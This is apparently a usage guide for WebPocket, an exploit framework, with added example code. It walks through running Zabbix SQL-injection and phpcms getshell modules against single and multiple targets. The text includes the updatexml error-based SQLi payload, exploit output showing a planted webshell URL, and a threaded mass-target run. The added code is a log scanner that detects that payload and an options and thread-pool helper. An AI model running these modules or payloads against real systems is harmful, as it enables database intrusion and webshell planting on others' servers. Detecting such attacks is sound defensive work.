Quick Start
Download && Install
First, clone the latest code to your machine:
git clone https://github.com/TuuuNya/WebPocket
Then install the Python modules it requires (the -r flag is needed so pip reads the requirements file instead of trying to install a package named requirements.txt):
pip install -r requirements.txt
If you want to use a virtual environment, install virtualenv or another Python virtual-environment tool yourself.
Run the following command; if you see the WebPocket banner, the installation is complete.
python WebPocket.py
➜ python3 WebPocket.py
W) ww b) P)ppppp k) t)
W) ww b) P) pp k) t)tTTT
W) ww ww e)EEEEE b)BBBB P)ppppp o)OOO c)CCCC k) KK e)EEEEE t)
W) ww ww e)EEEE b) BB P) o) OO c) k)KK e)EEEE t)
W) ww ww e) b) BB P) o) OO c) k) KK e) t)
W)ww www e)EEEE b)BBBB P) o)OOO c)CCCC k) KK e)EEEE t)T
(✿ ♥‿♥) WebPocket has 2 modules
WebPocket >
Common Commands
Running a POC/EXP against a single target
Here we take the module exploits/http/zabbix/zabbix_latest_php_sqli as an example and run it against the target http://127.0.0.1:8080.
WebPocket > use exploits/http/zabbix/zabbix_latest_php_sqli
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > show options
Module options:
name required description value
------- ---------- ------------------------------------- ---------------------------------
URL True The url to be tested
TIMEOUT True Connection timeout 5
THREADS True The number of threads 1
SQL True The SQL statement you want to execute updatexml(0,concat(0xa,user()),0)
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > set URL http://127.0.0.1:8080
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > check
[+] Check success!
[+] URL:http://127.0.0.1:8080 has the vulnerability
[*] module execution completed
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > exploit
[+] Exploit success!
[+] Exploit result: root@172.18.0.4
[*] module execution completed
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) >
First use the module, then run show options to see which parameters need to be set. Finally run check or exploit to perform the check or the test.
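The default value of the SQL option in the session above, updatexml(0,concat(0xa,user()),0), is the signature of error-based MySQL injection: the result is forced into a database error message. The block below is an added defender-side example, not WebPocket code, that scans web access logs for that payload shape. It generalises slightly beyond the page by also matching extractvalue(), MySQL's other XPath function that is used the same way, and it URL-decodes the request path first so encoded or double-encoded payloads are still seen. The log lines are constructed for the example.

```python
"""Added example (not part of WebPocket): flag error-based MySQL SQLi
payloads such as updatexml(...)/extractvalue(...) in access-log lines."""
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Constructed Combined-Log-Format lines; none of this is real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?id=1%20and%20updatexml(0,concat(0xa,user()),0) HTTP/1.1" 500 312 "-" "python-requests/2.25"',
    '10.0.0.9 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?id=1%27%20and%20extractvalue(1,concat(0x7e,version())) HTTP/1.1" 500 310 "-" "python-requests/2.25"',
    '10.0.0.7 - - [10/Oct/2023:13:56:02 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

# Client IP, timestamp, method, request path and status of one log line.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The two MySQL XPath functions abused for error-based extraction.
ERROR_BASED_RE = re.compile(r'\b(updatexml|extractvalue)\s*\(', re.IGNORECASE)


def decode_path(path: str) -> str:
    """URL-decode repeatedly (at most 3 rounds) so %2520-style double encoding
    does not hide the payload from the pattern match."""
    for _ in range(3):
        decoded = unquote_plus(path)
        if decoded == path:
            break
        path = decoded
    return path


def find_error_based_sqli(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per log line whose decoded path carries the payload."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        decoded = decode_path(m.group("path"))
        found = ERROR_BASED_RE.search(decoded)
        if found:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "function": found.group(1).lower(),
                "status": m.group("status"),
                "path": decoded,
            })
    return hits


if __name__ == "__main__":
    for hit in find_error_based_sqli(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["function"]} status={hit["status"]} {hit["path"]}')
```

A 500 status next to such a request is itself a useful signal: error-based injection only works when the database error reaches the response, so suppressing detailed SQL errors in the application removes the channel the payload relies on.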
Running a POC/EXP against multiple targets
First run python WebPocket.py to enter the interactive command line.
When you want to run a POC against multiple targets, write the targets into a txt file and pass it in with set URL -f target.txt. For example:
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > use exploits/http/zabbix/zabbix_latest_php_sqli
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > show options
Module options:
name required description value
------- ---------- ------------------------------------- ---------------------------------
URL True The url to be tested
TIMEOUT True Connection timeout 5
THREADS True The number of threads 1
SQL True The SQL statement you want to execute updatexml(0,concat(0xa,user()),0)
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > set URL -f url.txt
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > set THREADS 20
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > exploit
[+] Exploit result: root@172.18.0.4
[+] Exploit result: root@172.18.0.4
[+] URL:http://www.hackersb.cn Maybe not zabbix? not found zbx_sessionid
[+] URL:http://www.hackersb.cn Maybe not zabbix? not found zbx_sessionid
[+] Exploit result: root@172.18.0.4
[+] Exploit result: root@172.18.0.4
[+] URL:http://www.hackersb.cn Maybe not zabbix? not found zbx_sessionid
[+] URL:http://www.hackersb.cn Maybe not zabbix? not found zbx_sessionid
[+] URL:http://www.hackersb.cn Maybe not zabbix? not found zbx_sessionid
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) >
As you have probably noticed, you can set THREADS to choose the number of threads; multi-threaded execution is supported :)
All Commands
help
Type help to view all commands:
WebPocket > help
Documented commands (type help <topic>):
Core Command
============
banner db_rebuild
Module Command
==============
back check exploit list reload run search set show use
Other
=====
help history quit
WebPocket >
help can be followed by a WebPocket command to view what that command does:
WebPocket > help quit
Usage: quit [-h]
Exit this application
optional arguments:
-h, --help show this help message and exit
WebPocket >
list
The list command lists all available modules:
WebPocket > list
Module List:
module_name check disclosure_date description
------------------------------------------- ------- ----------------- -----------------------------------
exploits/cms/zabbix_2_0_3_sqli False 2016-08-22 zabbix 2.0.3 jsrpc.php sqli
exploits/cms/phpcms_9_6_0_register_getshell True 2017-04-14 phpcms 9.6.0 register page getshell
WebPocket >
Note: when WebPocket starts it automatically creates a sqlite database under the database/ directory, and the search command reads its results from that database. If you add or delete modules, run db_rebuild to rebuild the database so that the new set of modules can be searched.
search
The search command looks up modules; you can search by the name, module_name, description, author, disclosure_date, service_name, service_version and check fields. By default it searches by module_name, for example:
WebPocket > search phpcms
Search results:
module_name check disclosure_date description
------------------------------------------- ------- ----------------- -----------------------------------
exploits/cms/phpcms_9_6_0_register_getshell True 2017-04-14 phpcms 9.6.0 register page getshell
[+] The search is only retrieved from the database
[+] If you add some new modules, please execute `db_rebuild` first
WebPocket >
Multiple keywords are supported; usage is as follows:
WebPocket > search service_name=phpcms service_version=9.6.0
Search results:
module_name check disclosure_date description
------------------------------------------- ------- ----------------- -----------------------------------
exploits/cms/phpcms_9_6_0_register_getshell True 2017-04-14 phpcms 9.6.0 register page getshell
[+] The search is only retrieved from the database
[+] If you add some new modules, please execute `db_rebuild` first
WebPocket >
use
The use command selects the module to work with:
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > use exploits/cms/phpcms_9_6_0_register_getshell
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) >
show
The show command displays module information and supports the info, options and missing subcommands. show info shows the module information together with the module parameters; show options shows only the module parameters; show missing shows the parameters that are required but have not been set yet.
Usage example:
WebPocket > use exploits/cms/phpcms_9_6_0_register_getshell
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > show info
Module info:
name: phpcms 9.6.0 register getshell
description: phpcms 9.6.0 register page getshell
author: ['unknown']
references: ['https://www.hackersb.cn/hacker/219.html']
disclosure_date: 2017-04-14
service_name: phpcms
service_version: 9.6.0
Module options:
name required description value
-------- ---------- ----------------- -------
host True The target domain
password True webshell password
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > show options
Module options:
name required description value
-------- ---------- ----------------- -------
host True The target domain
password True webshell password
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > show missing
Missing Module options:
name required description value
-------- ---------- ----------------- -------
host True The target domain
password True webshell password
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) >
set
The set command sets a module parameter; the format is set name value. Usage example:
WebPocket > use exploits/cms/phpcms_9_6_0_register_getshell
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > show options
Module options:
name required description value
-------- ---------- ----------------- -------
host True The target domain
password True webshell password
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > set host http://www.hackersb.cn
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > set password 123
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) >
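The show options table, set name value, the set URL -f target.txt form from the multi-target section, show missing and the THREADS setting all operate on one options structure. The block below is an added example, not WebPocket's own code, of how those pieces fit together: an option record with a required flag, a set that accepts either a value or a target file, a missing() that reports what show missing prints, and a bounded thread pool in which one target's failure (the "Maybe not zabbix?" lines in the multi-target run above) is recorded instead of aborting the batch. Class and function names are assumptions.

```python
"""Added example (not WebPocket code): module options with `set`, `set -f`,
`show missing`, a `show options`-style table and a THREADS-bounded runner."""
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass
from typing import Any, Callable, Dict, List, Union

Value = Union[None, str, List[str]]


@dataclass
class Option:
    name: str
    required: bool
    description: str
    value: Value = None


def parse_target_lines(lines: List[str]) -> List[str]:
    """One target per line; blank lines, '#' comments and duplicates are dropped."""
    seen, targets = set(), []
    for line in lines:
        t = line.strip()
        if not t or t.startswith("#") or t in seen:
            continue
        seen.add(t)
        targets.append(t)
    return targets


class ModuleOptions:
    """The option table of one selected module, keyed by option name."""

    def __init__(self, options: List[Option]):
        self._opts: Dict[str, Option] = {o.name: o for o in options}

    def set(self, name: str, *args: str) -> None:
        """`set NAME VALUE` stores one value; `set NAME -f FILE` stores the
        list of targets read from FILE."""
        if name not in self._opts:
            raise KeyError(f"unknown option: {name}")
        if len(args) == 2 and args[0] == "-f":
            with open(args[1], encoding="utf-8") as fh:
                self._opts[name].value = parse_target_lines(fh.readlines())
        elif len(args) == 1:
            self._opts[name].value = args[0]
        else:
            raise ValueError("usage: set NAME VALUE | set NAME -f FILE")

    def missing(self) -> List[str]:
        """What `show missing` reports: required options that are still unset."""
        return [o.name for o in self._opts.values() if o.required and not o.value]

    def targets(self, name: str) -> List[str]:
        """Always a list, so a module loops the same way over one or many targets."""
        v = self._opts[name].value
        return v if isinstance(v, list) else ([v] if v else [])

    def table(self) -> str:
        """Render the four-column table that `show options` prints."""
        header = ("name", "required", "description", "value")
        rows = [(o.name, str(o.required), o.description,
                 "" if o.value is None else str(o.value)) for o in self._opts.values()]
        widths = [max(len(r[i]) for r in rows + [header]) for i in range(4)]
        fmt = "  ".join("{:<%d}" % w for w in widths)
        out = [fmt.format(*header), fmt.format(*("-" * w for w in widths))]
        out += [fmt.format(*r) for r in rows]
        return "\n".join(out)


def run_targets(targets: List[str], fn: Callable[[str], Any], threads: int = 1) -> Dict[str, Any]:
    """Run fn(target) with at most `threads` workers (the THREADS option).
    An exception for one target becomes that target's result; the rest continue."""
    def guarded(target: str):
        try:
            return target, fn(target)
        except Exception as exc:  # one bad target must not stop the batch
            return target, f"error: {exc}"
    with ThreadPoolExecutor(max_workers=max(1, int(threads))) as pool:
        return dict(pool.map(guarded, targets))


if __name__ == "__main__":
    opts = ModuleOptions([Option("URL", True, "The url to be tested"),
                          Option("TIMEOUT", True, "Connection timeout", "5"),
                          Option("THREADS", True, "The number of threads", "1")])
    print(opts.table())
    print("missing:", opts.missing())
```

Keeping TIMEOUT and THREADS as required options with defaults, as the page's table does, means show missing only ever complains about URL, while a target file with blank or commented lines is tolerated rather than producing empty requests.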
check
The check method tests whether the target has the vulnerability the module corresponds to; think of it as vulnerability verification (POC).
Usage example:
WebPocket > use exploits/cms/phpcms_9_6_0_register_getshell
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > show options
Module options:
name required description value
-------- ---------- ----------------- -------
host True The target domain
password True webshell password
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > set host http://www.hackersb.cn
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > set password 123
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > check
[+] Check success!
[+] Target http://www.hackersb.cn has vul
[*] module execution completed
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) >
exploit / run
The exploit command is equivalent to run and executes the module / exploit.
Usage example:
WebPocket > use exploits/cms/phpcms_9_6_0_register_getshell
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > show options
Module options:
name required description value
-------- ---------- ----------------- -------
host True The target domain
password True webshell password
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > set host http://www.hackersb.cn
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > set password 123
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > exploit
[+] Exploit success!
[+] Webshell: http://www.hackersb.cn/shell.php
[*] module execution completed
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) >
back
The back command deselects the currently selected module; it is the opposite of use.
reload
The reload command reloads the modules. For example, if you modified module code after starting WebPocket and need the latest code to be loaded, use this command.